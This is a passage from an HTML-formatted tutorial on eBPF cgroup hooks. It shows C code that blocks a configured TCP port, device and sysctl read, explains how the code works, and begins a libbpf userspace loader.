&lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;cb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;cb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== 1) Network: block TCP connect4 to specified port =====
 * ctx: struct bpf_sock_addr
 * user_ip4/user_port: network byte order (need conversion)
 *
 * Return semantics:
 * - return 1: allow
 * - return 0: deny (userspace gets EPERM)
 */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"cgroup/connect4"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;cg_connect4&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_sock_addr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;protocol&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;IPPROTO_TCP&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ntohs&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;__u16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;user_port&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;EVENT_CONNECT4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;user_ip4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* network order */&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;         &lt;span class="cm"&gt;/* host order */&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;protocol&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* deny -&amp;gt; userspace gets EPERM on connect */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== 2) Device: block access to specified major:minor =====
 * ctx: struct bpf_cgroup_dev_ctx { access_type, major, minor }
 *
 * Return semantics:
 * - return 0: deny (userspace gets EPERM)
 * - return non-zero: allow
 */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"cgroup/dev"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;cg_dev&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_cgroup_dev_ctx&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;EVENT_DEVICE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;major&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;minor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;access_type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;access_type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* deny -&amp;gt; -EPERM */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== 3) Sysctl: block reading specified sysctl =====
 * ctx: struct bpf_sysctl
 * Use bpf_sysctl_get_name() to get name
 *
 * Return semantics:
 * - return 0: reject
 * - return 1: proceed
 * If return 0, userspace read/write returns -1 with errno=EPERM
 */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"cgroup/sysctl"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;cg_sysctl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_sysctl&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_sysctl_get_name&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Only deny reads, allow writes (safer for testing) */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;str_eq&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;EVENT_SYSCTL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#pragma unroll
&lt;/span&gt;        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* deny -&amp;gt; -EPERM */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Understanding the BPF Code
&lt;/h4&gt;

&lt;p&gt;The overall logic of this program is clear: three cgroup hooks handle network connections, device access, and sysctl reads/writes respectively. Each hook follows the same workflow—check if the current operation matches the configured blocking rule, report an event via ringbuf and return 0 (deny) if it matches, otherwise return 1 (allow).&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;cg_connect4&lt;/code&gt; function uses &lt;code&gt;SEC("cgroup/connect4")&lt;/code&gt; to attach at IPv4 connection time. There's an important detail here: &lt;code&gt;ctx-&amp;gt;user_port&lt;/code&gt; is in network byte order (big-endian), while our configured port is in host byte order, so we must convert with &lt;code&gt;bpf_ntohs()&lt;/code&gt; before comparing. If the destination port matches our configured &lt;code&gt;blocked_tcp_dport&lt;/code&gt;, the program returns 0, and the userspace &lt;code&gt;connect()&lt;/code&gt; call fails with &lt;code&gt;EPERM&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;cg_dev&lt;/code&gt; function handles device access. Its context &lt;code&gt;struct bpf_cgroup_dev_ctx&lt;/code&gt; contains three key fields: &lt;code&gt;major&lt;/code&gt; and &lt;code&gt;minor&lt;/code&gt; identify the device (e.g., &lt;code&gt;/dev/null&lt;/code&gt; is 1:3), and &lt;code&gt;access_type&lt;/code&gt; indicates the access type (read/write/mknod). We simply compare whether major:minor matches the configured values.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;cg_sysctl&lt;/code&gt; function intercepts sysctl reads/writes under &lt;code&gt;/proc/sys/&lt;/code&gt;. It uses &lt;code&gt;bpf_sysctl_get_name()&lt;/code&gt; to get the sysctl name, in path format like &lt;code&gt;kernel/hostname&lt;/code&gt; (slash-separated, not dots). We only block reads, allowing writes—this is safer for testing and won't accidentally change system configuration.&lt;/p&gt;

&lt;p&gt;The configuration options at the top of the program are declared as &lt;code&gt;const volatile&lt;/code&gt;. This is the standard CO-RE (Compile Once, Run Everywhere) pattern: these values are defaults (0 or empty string) at compile time, and userspace sets the actual values via &lt;code&gt;skel-&amp;gt;rodata-&amp;gt;&lt;/code&gt; before &lt;code&gt;load()&lt;/code&gt;. This allows a single compiled BPF program to run with different configurations.&lt;/p&gt;

&lt;h3&gt;
  
  
  Userspace Loader: cgroup_guard.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause&lt;/span&gt;
&lt;span class="cm"&gt;/* cgroup_guard.c - Userspace loader for cgroup eBPF policy guard */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;errno.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;fcntl.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;getopt.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;signal.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/resource.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/stat.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;arpa/inet.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"cgroup_guard.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"cgroup_guard.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;sig_atomic_t&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

